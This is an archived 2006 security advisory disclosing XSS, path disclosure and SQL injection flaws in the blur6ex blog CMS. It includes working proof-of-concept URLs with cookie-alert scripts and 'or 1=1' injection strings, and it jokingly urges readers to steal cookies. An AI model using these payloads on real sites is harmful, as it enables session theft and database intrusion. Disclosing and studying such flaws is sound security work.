Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12177
HistoryApr 12, 2006 - 12:00 a.m.

Multiple vulnerabilities in Blur6ex

2006-04-1200:00:00
vulners.com
13

k k kkkk k kkkk k k kkkkkk kkkkkk kkkk k k k k k
k k k k k k k k k kk k k k k kk k k k k
kk <><> kkkkk k kkkkk kk kk kkkkkk k k k k k k kk
k k k k k k k kk k k k k k k k k k k
k k kkkk k kkkk k k kk k k kkkk k kk k k k

-+| Multiple Vulnerabilities in blur6ex

Author : Rusydi Hasan M
a.k.a : cR45H3R
Date : April,10th 2006
Place : Indonesia, Cilacap

-+| Software description

blur6ex is a content management system for manage a blog.
Version : 0.3.462

-+| the bugs

  1. I got XSS and full path disclosures in one step.
  2. SQL injection

-+| Proof of Concept [PoC]

[0] XSS + Full path disclosures

http://[victim]/[blur6ex_dir]/index.php?shard=[XSS_here]
http://[victim]/[blur6ex_dir]/index.php?shard=login&action=g_error&errormsg=[XSS_here]

after you put XSS on the URL, the XSS will work and you also get the root
directory from the error message.

E[x]ample :

http://127.0.0.1/blur/index.php?shard=&#37;3Ch1&#37;3Ejust&#37;20test&#37;20your&#37;20web&#37;3C/h1&#37;3E

Warning: main(): Failed opening 'engine/shards/<h1>just test your web</h1>.php'
for inclusion
(include_path='.:/usr/lib/php/:/usr/share/pear/') in
/var/www/html/blur/index.php on line 108

"just test your web" will show as <h1>

http://127.0.0.1/blur/index.php?shard=login&amp;action=g_error&amp;errormsg=&#37;3Cscript&#37;3Ealert&#40;document.
cookie)%3C/script%3E
http://127.0.0.1/blur/index.php?shard=&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E
http://127.0.0.1/blur/index.php?shard=&#37;3Cmarquee&#37;3E –> seems good.try it :)

Now, go and steal the cookie but don't eat it :P.

[1] SQL injection

http://[victim]/[blur6ex_dir]/index.php?shard=blog&action=g_reply&ID=[SQL_here]
http://[victim]/[blur6ex_dir]/index.php?shard=blog&action=g_permaPost&ID=[SQL_here]
http://[victim]/[blur6ex_dir]/index.php?shard=content&action=g_viewContent&ID=[SQL_here]

You can see the database structure in
http://[victim]/[blur6ex_dir]/install/blur6ex_tables.sql
if you were lucky :)

E[x]ample :

http://127.0.0.1/blur/index.php?shard=blog&amp;action=g_reply&amp;ID=&#39;or&#37;201=1/*

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server
version for the right syntax to use near '\'or 1=1/*' at line 1

http://127.0.0.1/blur/index.php?shard=blog&amp;action=g_reply&amp;ID=1&#37;20and&#37;201=0
http://127.0.0.1/blur/index.php?shard=blog&amp;action=g_reply&amp;ID=1&#37;20and&#37;201=1

-+| Vendor

I'm Still lazy [LOLZ]

-+| Shoutz

% fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,degleng,etc
% y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous, the
day
% ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa,m_beben

-+| Contact

[email protected] || http://kecoak.or.id